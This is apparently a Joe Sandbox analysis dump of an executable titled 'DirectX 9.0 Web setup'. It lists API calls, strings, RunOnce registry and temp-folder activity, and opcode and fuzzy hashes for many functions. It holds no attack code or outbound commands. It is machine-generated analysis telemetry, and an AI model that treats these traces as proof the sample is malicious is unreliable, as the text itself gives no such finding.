                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                • String ID: CheckTokenMembership$DirectX 9.0 Web setup$advapi32.dll
                                                                                                • API String ID: 4204503880-3291049768
                                                                                                • Opcode ID: 05aef74ab9c6aad8ac387d91b692b6fb9c51c55194fb5577f0a734ca75a63f4d
                                                                                                • Instruction ID: 7c54915b23e232019903c0576df7497f5bb26148f144bc74401e3466b5a6cae1
                                                                                                • Opcode Fuzzy Hash: 05aef74ab9c6aad8ac387d91b692b6fb9c51c55194fb5577f0a734ca75a63f4d
                                                                                                • Instruction Fuzzy Hash: 87117071944289FBDB12DFA99C48ADEBFB8EF18344F540099F181A3181C6758A04CB65
                                                                                                APIs
                                                                                                • SetFileAttributesA.KERNEL32(00771048,00000080,?,?,00000000), ref: 01002EE4
                                                                                                • DeleteFileA.KERNEL32(00771048,?,?,00000000), ref: 01002EEC
                                                                                                • LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EF7
                                                                                                • LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EFA
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01002F25
                                                                                                • SetCurrentDirectoryA.KERNEL32(01001284,?,00000000), ref: 01002F43
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01002F1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectorylstrcpy
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 2574644873-1193786559
                                                                                                • Opcode ID: 93e692ac1587df938e33032a71ea2a0dccc3e90e8b89d3b20b57e192b1dc1fa6
                                                                                                • Instruction ID: 960ce29c7a69c0d0d6bd76a451a08647df6ffba3f75ce7ea97df57adcc28d351
                                                                                                • Opcode Fuzzy Hash: 93e692ac1587df938e33032a71ea2a0dccc3e90e8b89d3b20b57e192b1dc1fa6
                                                                                                • Instruction Fuzzy Hash: DB11E27A500259DFFB73EF58E94C96577E8FB04340F45406EE2C052198CBBB9548CB50
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                • LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • FreeResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A97
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$FreeLoadLockSizeof
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 468261009-3102400635
                                                                                                • Opcode ID: 60513ed6fa868ebe5019eda0ed49016e3eb50df202396a8709f0f5900e5d54f2
                                                                                                • Instruction ID: b81af5958d1d79e739a71e668ea852868a10399b4e191fd1668772ccbe63b742
                                                                                                • Opcode Fuzzy Hash: 60513ed6fa868ebe5019eda0ed49016e3eb50df202396a8709f0f5900e5d54f2
                                                                                                • Instruction Fuzzy Hash: D301D631700148BBEB339B66AC88D7F7BADFB8A791F044019F986C7144CA768880DB61
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,?), ref: 01003878
                                                                                                • GetDesktopWindow.USER32 ref: 01003882
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 01003898
                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 010038AA
                                                                                                • SetForegroundWindow.USER32(?), ref: 010038B1
                                                                                                • EndDialog.USER32(?,00000002), ref: 010038BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 852535152-3102400635
                                                                                                • Opcode ID: 75a087d82200ebd705203d3342fd985e8dff23fa491e07dc86cdd8fdf240c47c
                                                                                                • Instruction ID: 5c13e9e4d6d24029a2895105e5d04483bb2c3333f3e538078e74f50813a3fb26
                                                                                                • Opcode Fuzzy Hash: 75a087d82200ebd705203d3342fd985e8dff23fa491e07dc86cdd8fdf240c47c
                                                                                                • Instruction Fuzzy Hash: 7E017C31510214AFFB675BA8D8089ED7B94FB05741F004891FAC2DA0C5CB7ACB41CBE0
                                                                                                APIs
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 010027EB
                                                                                                  • Part of subcall function 01002081: CharUpperA.USER32(?,00000001,?,00000000), ref: 010020A8
                                                                                                  • Part of subcall function 01002081: CharNextA.USER32(?), ref: 010020B7
                                                                                                  • Part of subcall function 01002081: CharNextA.USER32(00000000), ref: 010020BA
                                                                                                  • Part of subcall function 01002081: lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010020EA
                                                                                                  • Part of subcall function 01002081: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000), ref: 01002110
                                                                                                  • Part of subcall function 01002081: RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?), ref: 01002133
                                                                                                  • Part of subcall function 01002081: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0100214E
                                                                                                  • Part of subcall function 01002081: lstrcpyA.KERNEL32(?,?), ref: 01002162
                                                                                                  • Part of subcall function 01002081: RegCloseKey.ADVAPI32(?), ref: 01002176
                                                                                                • GetFileVersionInfoSizeA.VERSION(?,?,?,00000001,?,?,?,?,00000104,?,?,?,?,?,?,?), ref: 010026EF
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,0000003C,?,0000003C,00000001,?,?,?,?,00000001,?,?,?,?,00000104), ref: 01002702
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 01002714
                                                                                                • GetFileVersionInfoA.VERSION(0000003C,?,?,00000000), ref: 0100272E
                                                                                                • VerQueryValueA.VERSION(00000000,0100132C,0000003C,0000003C,0000003C,?,?,00000000), ref: 01002745
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 010027AC
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 010027FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersionlstrcpy$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                • String ID:
                                                                                                • API String ID: 2416581039-0
                                                                                                • Opcode ID: d36b2cbb2bcf2f010609546f27dacd5adc000b5a5f889186ab3a9f49350142b4
                                                                                                • Instruction ID: 715b562a5a0b13aa3d3becab1fee66edbba7586ed49f21780c7e5d38fec6c3f0
                                                                                                • Opcode Fuzzy Hash: d36b2cbb2bcf2f010609546f27dacd5adc000b5a5f889186ab3a9f49350142b4
                                                                                                • Instruction Fuzzy Hash: 1B41717090020AEFEF12DF94CD88AEDBBF5FF44304F144069EA85A6591C7759980CF50
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000104,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002ADB
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AE2
                                                                                                • lstrcpyA.KERNEL32(?,00000104,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AF8
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AFF
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B09
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B13
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B1A
                                                                                                • lstrcatA.KERNEL32(?,?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$lstrcatlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2414487701-0
                                                                                                • Opcode ID: 7294cccf960f3f366eb54c5e099d3ec04d4912deaa84471d2f8e17bbbdc9ee5a
                                                                                                • Instruction ID: 5cb71324bf1073ba797ff75ade76f469c3bffa4559f515a1268d3d36d40ed6b7
                                                                                                • Opcode Fuzzy Hash: 7294cccf960f3f366eb54c5e099d3ec04d4912deaa84471d2f8e17bbbdc9ee5a
                                                                                                • Instruction Fuzzy Hash: 2701D63140829ABEEB23DF64DC48EAF3FE9DF4A310F044469F98492052CB75E0159BA1
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 0100297F
                                                                                                • GetWindowRect.USER32(010017FA,?), ref: 01002994
                                                                                                • GetDC.USER32(?), ref: 010029A8
                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 010029B4
                                                                                                • GetDeviceCaps.GDI32(010017FA,0000000A), ref: 010029C2
                                                                                                • ReleaseDC.USER32(?,010017FA), ref: 010029D1
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005), ref: 01002A27
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                • String ID:
                                                                                                • API String ID: 2212493051-0
                                                                                                • Opcode ID: e5b264a83dd9e846005674263491b2207fbfe43a598662fe0941c5ab6264e4cb
                                                                                                • Instruction ID: 4c28801afd84217de1cb5c416d2791a7d42eb7b966f216dd91684d3200acc53b
                                                                                                • Opcode Fuzzy Hash: e5b264a83dd9e846005674263491b2207fbfe43a598662fe0941c5ab6264e4cb
                                                                                                • Instruction Fuzzy Hash: 0B215932A0010AAFDF12CFBCCD899EEBBB9EB88310F008125F941E7254D735A9458B50
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,LICENSE,00000000,00000000,?,00000000,?,0100592D,00000000,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 0100449B
                                                                                                • LocalFree.KERNEL32(00000000,000004B1,00000000,00000000,00000010,00000000,LICENSE,00000000,00000000,?,00000000,?,0100592D,00000000,01005A22,00000000), ref: 010044E8
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                • LocalFree.KERNEL32(?,00000000,?,0100592D,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100454D
                                                                                                Similarity
                                                                                                • API ID: Resource$Local$ErrorFindFreeLast$AllocLoadLockMessageSizeof
                                                                                                • String ID: <None>$LICENSE
                                                                                                • API String ID: 3899723493-383193767
                                                                                                • Opcode ID: 9d552bdc682831cc17b8e5f489639f4026cf8ed1a791820ee76a1c03ef31662f
                                                                                                • Instruction ID: 6e0dad04b0308800c6e7bb6f83685405a54a227f071ddc6dc43be68e18665347
                                                                                                • Opcode Fuzzy Hash: 9d552bdc682831cc17b8e5f489639f4026cf8ed1a791820ee76a1c03ef31662f
                                                                                                • Instruction Fuzzy Hash: 791172B4600245BEF7236F21ACC4D7B366DE704399F018024B6C5D94C9DBBB8D408B34
                                                                                                APIs
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,?), ref: 01001DF7
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 01001E1D
                                                                                                • _lopen.KERNEL32(?,00000040), ref: 01001E2C
                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 01001E3D
                                                                                                • _lclose.KERNEL32(00000000), ref: 01001E46
                                                                                                Similarity
                                                                                                • API ID: CharDirectoryPrevPrivateProfileStringWindowsWrite_lclose_llseek_lopenlstrcpylstrlen
                                                                                                • String ID: wininit.ini
                                                                                                • API String ID: 1211533111-4206010578
                                                                                                • Opcode ID: f92e39143841338b23a30a7285bd343bbb73fc4a946f94324873422716c0777d
                                                                                                • Instruction ID: b7b4abcde96b08424be1b8ef761040528c423947c2d44bd333b95f446d3817fe
                                                                                                • Opcode Fuzzy Hash: f92e39143841338b23a30a7285bd343bbb73fc4a946f94324873422716c0777d
                                                                                                • Instruction Fuzzy Hash: BCF0AFB6600194A7E732E7799D8CEEB3ABCAB85710F000095B7D9E30C0D6B8C9458B70
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0100368D
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?), ref: 010036B8
                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010036E2
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 010036FF
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003675
                                                                                                Similarity
                                                                                                • API ID: Filelstrcpy$CharCloseCreateHandlePrevWritelstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 3080743287-1193786559
                                                                                                • Opcode ID: f3c43e67ddf95b47fdb9e484ccd9ecd1a78d65d94e8c236f23dda56cc12f1390
                                                                                                • Instruction ID: 19b174ac764301658f5366c9defac34423b59d1cd1d6115009132bdfdfa86dce
                                                                                                • Opcode Fuzzy Hash: f3c43e67ddf95b47fdb9e484ccd9ecd1a78d65d94e8c236f23dda56cc12f1390
                                                                                                • Instruction Fuzzy Hash: 48114F71900218EBDB22DF55DC88EDE7F7CFB49760F108155F58596184C7B59A84CFA0
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,?,00000005), ref: 01004170
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,01004E32,000007D6,00000000,010017B1,00000547,0000083E,?,?,00000000), ref: 0100417E
                                                                                                • DialogBoxIndirectParamA.USER32(00000000,00000000,?,0000083E,00000547), ref: 0100419D
                                                                                                • FreeResource.KERNEL32(00000000,?,01004E32,000007D6,00000000,010017B1,00000547,0000083E,?,?,00000000), ref: 010041A6
                                                                                                Similarity
                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 1214682469-3102400635
                                                                                                • Opcode ID: e997d8be0718b2931c3f9f962151c7850337d5e5bb85679e49a3f60c032731a3
                                                                                                • Instruction ID: 90e970f1d2589a349edb739379ec95ef873ddad6063cdbf399ebe6a889d0bac2
                                                                                                • Opcode Fuzzy Hash: e997d8be0718b2931c3f9f962151c7850337d5e5bb85679e49a3f60c032731a3
                                                                                                • Instruction Fuzzy Hash: 21018172300219BFEB235FA9AC88DEF7AADEB553A4F014465FB81A6080C7758C5087E4
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003724
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • GetFileAttributesA.KERNEL32(?,?,00000000), ref: 01003740
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0100375A
                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 01003765
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003718
                                                                                                Similarity
                                                                                                • API ID: LibraryLoadlstrcpy$AttributesCharFilePrevlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 4003292530-1193786559
                                                                                                • Opcode ID: 2a1abe798eeda10e1ecd94666a9ff7b2e6d0c61b8320ab0a73d9c68e693d9404
                                                                                                • Instruction ID: 9f94e3723cca4d266b99732e7a80262a7a37e234bfc11ab39ee7921fbbd2d32f
                                                                                                • Opcode Fuzzy Hash: 2a1abe798eeda10e1ecd94666a9ff7b2e6d0c61b8320ab0a73d9c68e693d9404
                                                                                                • Instruction Fuzzy Hash: E8F05EB4900608AFEB22AB64DE89EC97B68BB14305F404590F2C9E50C0D7B9E6898F50
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,?,?,00000000,01002F6A,?,00000000), ref: 01001968
                                                                                                • RegDeleteValueA.ADVAPI32(?,wextract_cleanup0,?,00000000,01002F6A,?,00000000), ref: 0100197A
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,01002F6A,?,00000000), ref: 01001983
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                • API String ID: 849931509-702805525
                                                                                                • Opcode ID: 458768e2f170180f9e320fe5dbc18e42d63c941c0fb649dab67b6fa9c1c2255c
                                                                                                • Instruction ID: ccbb5ff6748fd46fc05444b67dc659029424084cb7ec84c162ec529ad60e6887
                                                                                                • Opcode Fuzzy Hash: 458768e2f170180f9e320fe5dbc18e42d63c941c0fb649dab67b6fa9c1c2255c
                                                                                                • Instruction Fuzzy Hash: D3E04F30740358FBF733CB959D0EF697AACA700788F100058F2C1A1095D7F6D5009714
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,FINISHMSG,00000000,00000000,?,00000000,?,?,010059FB), ref: 01004672
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,?,?,010059FB), ref: 010046C9
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLocal$AllocFreeLoadLockMessageSizeof
                                                                                                • String ID: <None>$FINISHMSG
                                                                                                • API String ID: 1166655539-3091758298
                                                                                                • Opcode ID: 9fc84565805aa23d4fd31d628d8c3b998d3dee3f2991ba92e449fc6c41aa1772
                                                                                                • Instruction ID: c5b0bc608187105c25715251356598fe5d23ec77e1943fddc57e6d3d47a5b5c3
                                                                                                • Opcode Fuzzy Hash: 9fc84565805aa23d4fd31d628d8c3b998d3dee3f2991ba92e449fc6c41aa1772
                                                                                                • Instruction Fuzzy Hash: 5CF06D71241219BBF22366239C49F9B3E4CDB4A7D9F020151BBC5A50C2EAAAF400417D
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(75920440,?,00000000,75A73530,75920440,0100228C,?,?,7591E800), ref: 01005B7C
                                                                                                • CharPrevA.USER32(75920440,00000000,?,7591E800), ref: 01005B8C
                                                                                                • CharPrevA.USER32(75920440,00000000,?,7591E800), ref: 01005B98
                                                                                                • CharPrevA.USER32(75920440,00000000,?,7591E800), ref: 01005BAB
                                                                                                • CharNextA.USER32(00000000,?,7591E800), ref: 01005BB3
                                                                                                Similarity
                                                                                                • API ID: Char$Prev$Nextlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 295585802-0
                                                                                                • Opcode ID: 4b52c76db2cf62ff621c8a08fa6ba7fb40a7dbd169611f4951299f618a72bbfa
                                                                                                • Instruction ID: 9baf6fa903052a509665a9fab5b6fb85594512577d769c7e3968725e671f5898
                                                                                                • Opcode Fuzzy Hash: 4b52c76db2cf62ff621c8a08fa6ba7fb40a7dbd169611f4951299f618a72bbfa
                                                                                                • Instruction Fuzzy Hash: 0DF0F672505A542EF7331A2D8C88E7BBFDCDB872A1F040189F6C092081DAA95C408E72
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,0000083E), ref: 010017E3
                                                                                                • GetDesktopWindow.USER32 ref: 010017EB
                                                                                                • LoadStringA.USER32(?,00000000,00000200,?), ref: 01001816
                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 0100182B
                                                                                                • MessageBeep.USER32(000000FF), ref: 01001833
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1273765764-0
                                                                                                • Opcode ID: 52c35957c5d6308ac9e5b8dfae4ee701d5fa30329f22752cf5df4afad45c4fb5
                                                                                                • Instruction ID: dbb55cd7090eff77bfa65d7c4eba401a97cfafb7d2c079e3b47d5aa362050595
                                                                                                • Opcode Fuzzy Hash: 52c35957c5d6308ac9e5b8dfae4ee701d5fa30329f22752cf5df4afad45c4fb5
                                                                                                • Instruction Fuzzy Hash: D601283140024AABFB265FA4DC4CAEA3AB8BB04745F044564BAA9950E5CBB9CB51CB91
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?,DirectX 9.0 Web setup), ref: 010041E9
                                                                                                • MessageBeep.USER32(00000000), ref: 010043C0
                                                                                                • MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,?), ref: 01004439
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$BeepVersion
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2519184315-3102400635
                                                                                                • Opcode ID: b07f304ec63bc814189986a0719c39693d795c7fab61f747b2dc9ea387807f31
